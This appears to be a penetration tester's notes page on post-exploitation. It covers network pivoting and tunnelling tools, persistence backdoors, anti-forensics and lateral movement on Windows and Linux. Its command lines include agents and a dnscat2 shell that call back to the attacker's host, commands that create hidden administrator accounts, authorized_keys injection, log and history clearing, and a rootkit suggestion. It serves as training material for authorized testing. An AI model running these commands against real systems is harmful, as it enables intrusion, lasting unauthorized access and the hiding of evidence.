Final step - Post-exploitation ¶

Post-exploitation ✈️ is the last step of the pentester activities. Once we got access to the target, and escalated to administrator, we are trying to maintain and expand our access to other machines.

Pivoting to another victim is called lateral movement 🔓. Target high-value hosts such as SQL or Microsoft Exchange servers.

Common activities 🤖

• 🚪 Leave a backdoor (persistence)
• 🙊 Deface the public website
• 🕸️ Redirect users to a malicious website/server
• 💰 Stealing data (files, photos, emails, source code...)
• 🔑 Stealing credentials (authentication tokens, password, keepass)
• 🌋 Mess with timestamp/... to complicate forensics
• 🧹 Cleanup logs
• ⌨️ installing keyloggers
• 🧨 Edit software configurations/users permissions
• 🐲 Reset user passwords to access their account

Basic Pivoting Overview ¶

If a host has more than one network adapter (ip a, ifconfig, ipconfig), we may be able to use it to move to another network.

We will assume that we have the following hosts, and we want to reach C from A using B as the pivot host.

A: ["10.10.14.10"]                  # 10.10.10.0/8
B: ["10.10.14.100", "172.16.5.100"] # 10.10.10.0/8, 172.16.5.0/8
C: ["172.16.5.5", "172.16.10.5"]    # 172.16.5.0/8, 172.16.10.0/8
D: ["172.16.10.10"]                 # 172.16.10.0/8

We may use:

• Tunneling 📦: we encapsulate data within another protocol. We mostly see SSH (or DNS, ICMP, and RDP) and TCP forwarding.
• Port forwarding 🛣️: we use an agent listening between our host and the target, and forwarding message from one to the other.

Once we detect another network, we often want to find hosts. We can perform a ping sweep. For instance, with ping:

$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
cmd> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

TCP Forwarder — socat ¶

Refer to socat notes. For instance, to allow ligolo agent traffic on host C to reach host A, you can forward TCP traffic on B using:

$ socat TCP-LISTEN:11601,fork TCP:10.10.14.10:11601

SSH Port forwarding — SSH Command ¶

To access 172.16.5.5:3306, you can now use the port localhost:3389.

$ # local_port:target:target_port
$ ssh -L 3389:172.16.5.5:3389 [...]

We can also perform reverse port forwarding, by allowing the target to connect back to a port open on our machine. Below, if any target requests the port 8880 on the jump host we are connected to, then the request will be forwarded to us at 0.0.0.0:8080.

$ # jump_host:jump_port:our_host:our_port
$ # 0.0.0.0 is a wilcard == listen on every interface
$ # could have been: 172.16.5.100:8880:10.10.14.10:8080
$ ssh -vN -R 0.0.0.0:8880:0.0.0.0:8080 [...]

📚 You may use -T (No TTY) and -N (no remote command) and -f (&).

SSH Tunneling — SOCKS proxy ¶

We can use SOCKS to make it easier to interact with the target. It allows us to use dynamic port forwarding.

$ ssh -D 9050 username@10.10.14.100

SSH Tunneling — Linux Sockets ¶

We can use SSH to tunnel Unix sockets such as docker socket:

$ ssh -L /tmp/docker.sock:/var/run/docker.sock
$ # and use /tmp/docker.sock

SSH Tunneling — sshuttle ¶

sshuttle (11.7k ⭐), we can dynamically access any port of a network:

$ sudo apt install -y sshuttle
$ sshuttle -r username@10.10.14.100 172.16.5.0/24

⚠️ This tool doesn't support UDP, requires sudo locally, and doesn't support well nmap scans, but it's easy to set up.

Metasploit Tunneling — SOCKS proxy ¶

Refer to SOCKS proxy notes.

Metasploit Port Forwarding — Meterpreter ¶

Assuming your meterpreter for your current target can use portfwd:

meterpreter> portfwd add -R -l 8080 -p 8880 -L 0.0.0.0 # doesn't work much
meterpreter> portfwd add -l lport -p port -r target # access target:port

SSH Port Forwarding/Tunneling — PuTTY Link ¶

PuTTY may be installed on some hosts. Refer to the SSH sections for references on what you can do. For instance:

PS> # assuming you are Host A and running Windows
PS> plink -ssh -D 9050 username@10.10.14.100

After setting up a proxy server on host A to forward all requests to localhost:9050, you can use RDP from host A to access 172.16.5.5.

TCP Port Forwarding — Netsh ¶

If our jump host B is running Windows, we can use netsh to forward all traffic received on port 13389 to 172.16.5.5:3389.

PS> netsh.exe interface portproxy add v4tov4 listenport=13389 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.5
PS> netsh.exe interface portproxy show v4tov4 # show
PS> netsh interface portproxy delete v4tov4 listenport=13389 listenaddress=0.0.0.0 # delete

DNS Tunneling — Dnscat2 ¶

dnscat2 (3.4k ⭐, 2021 🪦) is a tunneling tool wrapping data within TXT records of DNS requests. Refer to ruby notes for installation notes.

$ DEST="$HOME/tools/dnscat2"
$ git clone -b "master" https://github.com/iagox86/dnscat2.git $DEST
$ bundle install --gemfile $DEST/server/Gemfile
$ ruby $DEST/dnscat2.rb --dns host=10.10.14.10,port=53,domain=example.com --no-cache
dnscat2> window -i 1 # on client connected

You can use their client or dnscat2.ps1 (0.4k ⭐, 2023 🪦).

PS> Import-Module .\dnscat2.ps1
PS> Start-Dnscat2 -DNSserver 10.10.14.10 -Domain example.com -PreSharedSecret XXX -Exec cmd

DNS Tunneling — iodine ¶

iodine (6.2k ⭐) is a tunneling tool.

TCP Tunneling — rpivot SOCKS proxy ¶

rpivot (0.6k ⭐, 2018 🪦) is a python2 SOCKS proxy over TCP. It's slow.

$ DEST="$HOME/tools/rpivot"
$ git clone -b "master" https://github.com/klsecservices/rpivot.git $DEST
$ python2.7 $DEST/server.py --proxy-port 9050 --server-port 1234 --server-ip 0.0.0.0

Upload *.py ntlm_auth to the target host and run:

$ python2.7 client.py --server-ip 10.10.14.10 --server-port 9999
$ # can authenticate to a proxy server if needed

TCP Tunneling — Ligolo-ng ¶

Ligolo-ng (2.8k ⭐) is a simple and powerful fork of ligolo (1.7k ⭐). On our host, we need to configure a network interface:

$ sudo apt install -y ligolo-ng
$ ligolo-proxy -selfcert # in another terminal, run:
$ sudo ip tuntap add user $USER mode tun ligolo
$ sudo ip link set ligolo up
$ sudo ip route add 172.16.5.0/24 dev ligolo # example
$ sudo ip tuntap delete ligolo mode tun # once you're done

On the target, download an agent and run it:

$ wget "https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_windows_amd64.zip"
$ wget "https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_linux_amd64.tar.gz"
$ ./agent -connect 10.10.14.10:11601 -ignore-cert

On our proxy server, we can start the tunneling. Now, we can smoothly send traffic to ligolo by defining routes and using them.

ligolo> sessions # pick one
ligolo> start # try: ping 172.16.5.5
ligolo> start --tun ligolo2 # one interface per agent

TCP Port Forwarding/Tunneling — chisel ¶

Chisel (13.2k ⭐) is often used to quickly set up TCP port forwarding. It's using HTTP and SSH, and can be used for tunneling (socks).

$ sudo apt install chisel
$ chisel server -p 1234 --reverse
$ chisel server -p 1234 --reverse --socks5

On the jump host, download the binary and run:

$ wget "https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz"
$ gunzip xxx.gz
$ # Ex: localhost:8080 will point to 172.16.5.5:80
$ ./chisel client 10.10.14.10:1234 R:8080:172.16.5.5:80
$ ./chisel client 10.10.14.10:1234 R:socks

In some scenarios, we can use the pivot as the server, and connect back to the pivot, but most of the time, there is a firewall.

$ chisel server -p 1234 --socks5
$ chisel client 10.10.14.100:1234 socks

ICMP Tunneling — ptunnel-ng ¶

We can use ptunnel-ng (0.4k ⭐) to tunnel traffic over ICMP. It requires that the target is able to reply to our host (try ping on both sides).

$ sudo apt install -y ptunnel-ng
$ git clone https://github.com/utoni/ptunnel-ng.git
$ cd ptunnel-ng && sudo ./autogen.sh

You need to upload ptunnel-ng to the pivot host B. Then, run:

$ sudo ./ptunnel-ng -r10.10.14.100 -R22 # Ex: 10.10.14.100:22 is behind firewall

Back on our host, we can access it at 127.0.0.1:22 using:

$ sudo ptunnel-ng -p10.10.14.100 -l2222 -r10.10.14.100 -R22

RDP Tunneling — SocksOverRDP ¶

SocksOverRDP (1.1k ⭐, 2022 🪦) can be used on a Windows host to create a tunnel with another Windows host. It uses Dynamic Virtual Channels (DVC). First, disable AV and as administrator, run:

PS> regsvr32.exe SocksOverRDP-Plugin.dll # Download it and put it in the current folder of host A
PS> mstsc.exe # RDP to host B
hostb> .\SocksOverRDP-Server.exe
PS> netstat -antb | findstr 1080 # (still admin, should show one line)

You can access internal hosts such as host C using localhost:1080.

Additional Pivoting Tools ¶

Thanks to noraj for their article.

• cloudflared (9.1k ⭐)
• Tunna (1.2k ⭐, python TCP port forwarding using HTTP)
• PivotSuite (0.4k ⭐, python TCP port forwarding)
• reGeorg (3.0k ⭐, 2017 🪦, TCP port forwarding using HTTP) + CN fork

💰 Stealing data/credentials on Windows 🔑 ¶

You can hunt for more secrets now that you have more privileges, but the process is the same.

You can refer to Windows Pentester Notes to dump the the SAM database, DPAPI keys, Kerberos tickets, etc.

📚 As administrator, use HKEY_USERS instead of HKEY_CURRENT_USER.

🚪 Leave a backdoor on Windows ¶

Create a new local user.

PS> net user <username> <password> /add

Add a user in the local administrator group.

PS> net localgroup administrators <username> /add

For active directory commands, refer to this.

🧨 Windows Edit software configurations ¶

On hosts connected to active directory, folders such as %APPDATA% are shared between machines. If we add a program in USERPROFILE\AppData\Microsoft\Windows\Start Menu\Programs\Startup, then it will be executed when the users log in.

🔓 Lateral Movement - Administrator Password Reuse ¶

We can use crackmapexec/nxc to test the administrator hash or password on many hosts.

$ nxc smb --local-auth CIDR -u administrator -H hash

If LAPS was implemented, refer to LAPS.

🔓 Lateral Movement - Find Interesting Users/Groups ¶

Refer to LDAP.

🔓 Lateral Movement - Golden/Silver Ticket ¶

A golden ticket is a forged ticket (TGT) created using the KRBTGT account NTLM password hash, and the information we want (ex: expire in 10 years, associated with account XXX even if disabled/deleted, etc.).

A silver ticket is a forged ticket (TGS) created using the target service account password hash. It's similar to a golden ticket aside from the fact that it only grants access to one service.

🚪🧨 Create or edit user privileges on Linux ¶

• Add a user with uid 0
• Add your user in special groups (shadow, disk, root)
• Edit /etc/sudoers

🌋 Complicate forensics on Linux ¶

• Remove or edit the shell history file (.bash_history?)

🚪 Leave a backdoor on Linux ¶

• Add your SSH key in [...]/.ssh/authorized_keys

$ ssh-keygen -f mykey
$ mkdir -p $TARGET_USER_HOME/.ssh
$ cp mykey.pub $TARGET_USER_HOME/.ssh/authorized_keys
$ chmod 777 $TARGET_USER_HOME/.ssh/authorized_keys
$ ssh target@0 -i mykey

• A rootkit is a set of tools used to maintain a high level of privileges on an host by infecting system files. They can be detected using chkrootkit (simple checks) or Rootkit Hunter (use an online database)

You can use Reptile (2.6k ⭐).

Windows

• See also VSS

Linux

• 🚪 You can give capabilities to a file with setcap
• SSH key

C2

• Sliver
• Metasploit

• Passive attacks (monitor)
• Active attacks
• Meterpreter
• /.dockerenv (check if we are in a docker)
• KeePass (see exploitation note too?)
• Vulnerable security questions (unencrypted, easy to guess, reset passwords)
• Pass-The-Hash Attack
• rootkit, bootkit
• Credential dumping
• Forensics: clear PowerShell history